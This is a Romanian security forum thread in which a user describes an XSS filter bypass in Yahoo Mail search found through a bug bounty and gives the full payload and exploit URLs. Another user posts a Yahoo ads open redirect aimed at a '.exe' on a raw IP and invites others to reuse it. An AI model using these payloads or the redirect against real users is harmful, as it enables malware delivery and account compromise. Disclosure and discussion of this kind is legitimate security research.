SilenTx0 Posted April 15, 2014 Report Posted April 15, 2014 (edited) No user-interaction: <img alt=" autofocus=true onfocus=alert(1) a="">De ce am folosit acest vector? Pentru ca, daca puneam <img src=x onerror=alert(1)> imi stergea onerror=alert(1) (sau orice event handler as fi folosit). Dupa mai multe incercari de a face bypass, am observat ca imi lasa atributul alt si src. Prin src n-am reusit sa fac nimic asa ca m-am folosit de atributul alt. Am vazut ca daca eu pun space in interiorul valorii atributului alt, automat se pun ghilimele unde gaseste primul space. Acum, in sursa arata cam asa:<input class="uh-srch-box" autofocus=true onfocus=alert(1) value="<img alt=" name="s">De ce autofocus=true? Daca as fi pus doar autofocus, mi s-ar fi adaugat ="" pentru ca scriptul verifica daca toate atributele au o valoare. In cazul in care un atribut nu avea o valoare, el adauga de la sine ="" iar vectorul meu nu ar mai functionat(fara interactiunea userului). Edited April 16, 2014 by SilenTx0 1 Quote
Byte-ul Posted April 17, 2014 Report Posted April 17, 2014 Foarte tare chestia... insa... de ce nu transforma < si " in < si " daca bagi <img alt ? Quote
SilenTx0 Posted April 17, 2014 Author Report Posted April 17, 2014 Foarte tare chestia... insa... de ce nu transforma < si " in < si " daca bagi <img alt ?Pentru ca pe atunci nu aveau pus htmlentities, acum au rezolvat vulnerabilitatea. Quote
SilenTx0 Posted June 19, 2014 Author Report Posted June 19, 2014 Initial am primit duplicate pe aceasta vulnerabilitate, am vazut ca dupa vreo doua saptamani inca nu era fixata asa ca am raportat-o din nou. Surpriza, VALID Recompensa lasa de dorit...http://awesomescreenshot.com/0aa3093z34 Quote
poq Posted June 19, 2014 Report Posted June 19, 2014 Dar cum au rezolvat atunci si acum ai gasit iar? Quote
SilenTx0 Posted June 19, 2014 Author Report Posted June 19, 2014 Dar cum au rezolvat atunci si acum ai gasit iar? Stii si tu cum sunt astia de la yahoo...Ei au redenumit aplicatia care facea cautarea din searchnew in search in loc sa foloseasca o functie care sa filtreze datele (Yahoo style).Adevarat ca daca dadeam click pe link-ul care l-am trimis in primul raport, xss-ul nu mergea dar daca bagam vectorul direct in search, functiona perfect.La fel am patit si cu un bug in maps.yahoo.com. Initial am primit duplicate, l-am raportat din nou si am primit valid:)).Link-ul dat la primul raport(duplicate): https://us-mg6.mail.yahoo.com/neo/b/searchnew?s=<img+alt="+autofocus=true+onfocus=alert(1)+a="">&fid=%40S%40Search&srchWebUrl=http://search.yahoo.com/search?fr=ush-mail&srchMail=Search+Mail Link-ul dat la al doilea raport(valid): https://us-mg6.mail.yahoo.com/neo/b/search?s=<img+alt="+autofocus=true+onfocus=alert(1)+a="">&fid=%40S%40Search&srchWebUrl=http://search.yahoo.com/search?fr=ush-mail&srchMail=Search+Mail Quote
yo20063 Posted June 19, 2014 Report Posted June 19, 2014 Won't fix https://ads.yahoo.com/clk?3,eJytjdEKgjAYhZ-mOxE3Z1tIF78tQWmW0Ygu1WWm1oIE0advgdUL9HEuzuE.hx-5vuNSRhjBOM.VPM8yHxEP07JUJWKW4.smL4iD6IJiqz1rDTvFBHDRuCyAN5FMix4-JDlEk5UAKYTrxx32053KVQJ.gbMmkJM3.y5GnIGnqB07MvjVqjYZ0zEZ5bA5xleBRScOYSsGdN1yiTYHdTvVEm953Ii6IOLyXS4tq-q6x3PmwgyHRn3f20NWaW0X-mbyC-CRWOg=,$http://193.27.70.11/bad_virus.exePentru a il folosi doar modificati url de la final Ps: merge de 3 luni incoace Quote
SilenTx0 Posted June 19, 2014 Author Report Posted June 19, 2014 Won't fix https://ads.yahoo.com/clk?3,eJytjdEKgjAYhZ-mOxE3Z1tIF78tQWmW0Ygu1WWm1oIE0advgdUL9HEuzuE.hx-5vuNSRhjBOM.VPM8yHxEP07JUJWKW4.smL4iD6IJiqz1rDTvFBHDRuCyAN5FMix4-JDlEk5UAKYTrxx32053KVQJ.gbMmkJM3.y5GnIGnqB07MvjVqjYZ0zEZ5bA5xleBRScOYSsGdN1yiTYHdTvVEm953Ii6IOLyXS4tq-q6x3PmwgyHRn3f20NWaW0X-mbyC-CRWOg=,$http://193.27.70.11/bad_virus.exePentru a il folosi doar modificati url de la final Ps: merge de 3 luni incoaceNu mai dau bani pe Open Redirect de la inceputul anului Quote
tpad Posted June 19, 2014 Report Posted June 19, 2014 Scam+mediatizare=Open Redirect added to bug bounty again. Quote
